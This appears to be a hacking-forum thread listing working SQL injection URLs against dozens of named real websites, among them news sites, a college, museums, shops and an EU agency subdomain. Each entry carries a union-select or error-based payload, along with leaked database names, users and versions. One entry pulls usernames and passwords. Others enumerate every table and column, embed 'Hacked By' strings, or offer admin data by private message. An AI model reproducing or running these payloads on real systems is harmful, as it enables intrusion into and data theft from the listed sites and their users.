Code: http://www.laitkipers.ru/news.php?id=40+and+false+union+select+1,unhex%28hex%28concat%28user_name,0x3a,user_pass%29%29%29,3,4,5,6+from+user--+ TIC: 10 PR: 1
Code: http://www.yorkshirecoastcollege.ac.uk/news.php?id=479+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+(select+1+union+select+2+union+select+3)x+group+by+2+limit+1)a) TIC: 0 PR: 6
Code: http://rumafia.com/ru/news.php?id=-214+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16+--+ TIC: 20 PR: 3
Code: http://goldenformula.net/news.php?id=48+and+1=0+union+select+1,2,3,4,version%28%29,6-- TIC: 100 PR: 4
PHP: http://www.frontviewsgallery.de/exhibition.php?exhibition_id=6+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11--
Code: http://www.astrakhanfm.ru/news/news.php?id=27341+and+1=0+union+select+1,version%28%29,database%28%29,4,user%28%29,6,7-- TIC: 200 PR: 5
Code: http://www.glimz.net/info.php?individual=4603%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201=1
User: [email protected] Version: 5.0.51a-24+lenny5-log Database: glimz_net1 PR 5 TIC 10
Code: http://ngfrussia.ru/news.php?id=524+and+1=0+union+select+1,database%28%29,version%28%29,4,5,6,7,8,9,10-- DataBase: ngf Version DB: 5.0.77 User BD: leni@localhost TIC: 40 PR: 3
Code: http://www.chexov.net/news.php?id=571+union+select+user%28%29,database%28%29,3,4,version%28%29,6+--+ DataBase: u155206 Version DB: 5.0.77-log User BD: u155206@localhost TIC: 4 PR: 3
P.S. See the comments
Code: http://www.hellolulu.com/group.php?cat1_id=-1+union+select+1,2-- http://www.hellolulu.com/admin/ PR: 2 version: 5.0.45 user: hellolul@localhost database: hellolul01
Code: http://bwd.eea.[COLOR=YellowGreen][B]europa.eu[/B][/COLOR]/kml_export.php?cc=' union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),database()),10,11,12,13,14,15,16,17,18,19,20 and 'x'='x
User: bwdfull@localhost Version: 5.0.77 Database: bwd PR 9 TIC 4800
P.S. A vulnerability was already found on this site, but on a different subdomain with a different DB.
Code: http://fishres.ru/news/news.php?id=14572+and+1=0+union+select+1,2,user%28%29,version%28%29,5,6,7,8,database%28%29-- DataBase: murfish4_test Version DB: 4.0.27-log User BD: [email protected] TIC: 600 PR: 3
Code: http://www.civilista.ru/news.php?id=22+and+1=0+union+select+1,2,0x4861636b6564204279204f7373747564696f212121,version%28%29,5,database%28%29,7-- DataBase: u9620_civilista_ru Version DB: 5.0.89-log User BD: u9620@be2 TIC: 20 PR: 2
P.S. Note the title
{
Current DB: u9620_civilista_ru
Data Base Found: information_schema
Data Base Found: u9620
Data Base Found: u9620_biruk
Data Base Found: u9620_cb
Data Base Found: u9620_civilista
Data Base Found: u9620_civilista_ru
Data Base Found: u9620_mediator
Data Base Found: u9620_mucb
Data Base Found: u9620_prav66
Data Base Found: u9620_prav66_forum
Data Base Found: u9620_privlaw
Data Base Found: u9620_zagovor
Data Base Found: u9620_zhurnal
Data Base Found: u9620_zhurnal_new
Enter our site here, http://2ip.ru/domain-list-by-ip/, and we get the sites from these databases.
}
Code: http://kolesaonline.ru/news.php?id=66+and+1=0+union+select+1,version%28%29,database%28%29,user%28%29,5,6-- DataBase: kolesa Version DB: 4.1.25-log User BD: kolesa-sql@localhost TIC: 120 PR: 2
Code: http://www.fauna-servis.ua/news.php?id=407+and+1=0+union+select+1,2,0x4861636b6564204279204f7373747564696f2121,4,5,6,concat_ws%280x3a3a3a,user%28%29,database%28%29,version%28%29%29,8,9,10,11,12-- DataBase: faunaservis Version DB: 5.0.51a-24+lenny5 User BD: u_faunaservi@localhost TIC: 50 PR: 3
Code: http://www.rody18.spb.ru/news.php?id=51+and+1=0+union+select+1,2,0x5961207665726e756c73796121,concat_ws%280x3a3a3a,user%28%29,database%28%29,version%28%29%29,5,6,7,0x3a44-- DataBase: db00143987 Version DB: 4.1.25-log User BD: 00143987@localhost TIC: 30 PR: 3
Code: http://n-europe.eu/content/index.php?p=1262%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201=1
User: u3249_old@localhost Version: 5.1.57-rel12.8 Database: u3249_old1 PR 6 TIC 300
P.S. Look at the page source; the error is commented out.
http://www.mbzspeciesconservation.org/includes/get-data/getCountries.php?countryCode=-4+union+select+1,2,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)--
http://www.atic.ae/ar/media-center/generate-html-Ar.php?id=483+union+select+1,2,0x323030302d30312d3031,4,5,6,7,8,9,0,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)--
PHP: http://www.angstromloudspeakers.com/item_list.php?sub_cat_id=-149+union+select+concat(database(),char(59),version(),char(59),user())+--+ VERSION : 4.1.22-standard DATABASE : angstrom_sysdata USER : angstrom_u0708@localhost PR - 3
PHP: http://www.aquaticdepot.net/sub_category_desc.php?sub_cat_id=-8+union+select+1,2,concat(database(),char(59),version(),char(59),user()),4,5,6+--+ VERSION : 5.0.91-log DATABASE : db264189880 USER : [email protected]
PHP: http://www.medicaltourismmag.com/detail.php?Req=199+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(database(),char(59),version(),char(59),user()),13,14,15,16,17+--+ VERSION : 5.0.92-community-log DATABASE : medicalm_mtm USER : medicalm_mtm@localhost PR - 4
PHP: http://www.greyblue.net/MidnightBlue/story.php?storyid=-2+union+select+1,2,concat(database(),char(59),version(),char(59),user()),4,5,6,7,8+--+ VERSION : 5.1.53-log DATABASE : greyblue USER : [email protected] PR - 1
PHP: http://www.thecardchest.com/sid/viewStory.php?storyID=-243+union+select+1,2,concat(database(),char(59),version(),char(59),user()),4+--+ VERSION : 5.0.77 DATABASE : sid USER : sidUser@localhost PR - 3
Code: http://www.club-crosswind.com/news.php?id=161+and+1=0+union+select+1,2,3,4,5,6,0x4861636b6564206279204f7373747564696f212121,concat_ws%280x3a3a3a,user%28%29,database%28%29,version%28%29%29-- DataBase: clubcrosswindcom Version DB: 5.0.51a-24+lenny4-log User BD: clubcrosswindcom@localhost TIC: 40 PR: 4
Code: http://vniisubtrop.ru/news.php?id=1+and+1=0+union+select+1,2,version%28%29,4,5,6,7,database%28%29-- DataBase: gb_vnii Version DB: 5.0.54-log User BD: [email protected] TIC: 20 PR: 2
http://www.safmuseum.org/pages/bio.php?id=-70%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,version%28%29,23,24,25,26,27--+from+admins--+.html
And a bit more cr*p:
http://www.starkeyhearingfoundation.org/post-event.php?id=-41+union+select+1,2,3,4,5,6,7,8,user%28%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--+
Code: http://www.noutov.info/news.php?id=7+and+1=0+union+select+1,2,version%28%29,database%28%29,5,6,7-- DataBase: dbeuronout Version DB: 4.0.26-log User BD: noutov@localhost TIC: 30 PR: 2
Code: http://www.stella-science.eu/initiatives_view.php?id=710 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
User: stella@localhost Version: 5.0.77-log Database: stella1 PR 5
Code: http://www.burko.eu/index.php?id=22.2%20union%20all%20select%20concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29+--+
User: root@localhost Version: 5.1.56 Database: today PR 1
SQLI
Code: _http://uventa-spb.ru/index.php?new=1+union+select+1,2,username,4,5,6,7,8,8+from+z102451_uventa.jv_users+where+id=1+--+
5.1.49-3-log z102451_uventa [email protected]
==================================================
BSQLI
Code: _http://ruselt.ru/news.php?id=1&page=191+union+select+1,2,3,4,5,6,7,8+--+
5.0.90-log u33206 [email protected]
==================================================
SQLI
Code: _http://www.lyceumtheatre.org/production.php?id=1+union+select+1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,1,1,1+--+
5.0.51a-3ubuntu5.1 lyceumtheatre testlyceum@localhost
stranger1341, PM me for the admin data.
Code: http://www.sklepy-online.pl/?exec=showscat&id=51.1'+union+select+concat_ws(0x3a,user(),version(),database()),2+and+'x'='x
User: sql_arteesoft13@localhost Version: 5.1.49-3 Database: sql_arteesoft13_so PR 4
Code: http://www.prokitetour.com/news.php?id=185%27+and+1=0+union+select+1,2,3,version%28%29,database%28%29,user%28%29,7,8+--+ DataBase: db271821761 Version DB: 5.0.77 User BD: db271821761@localhost TIC: 20 PR: 4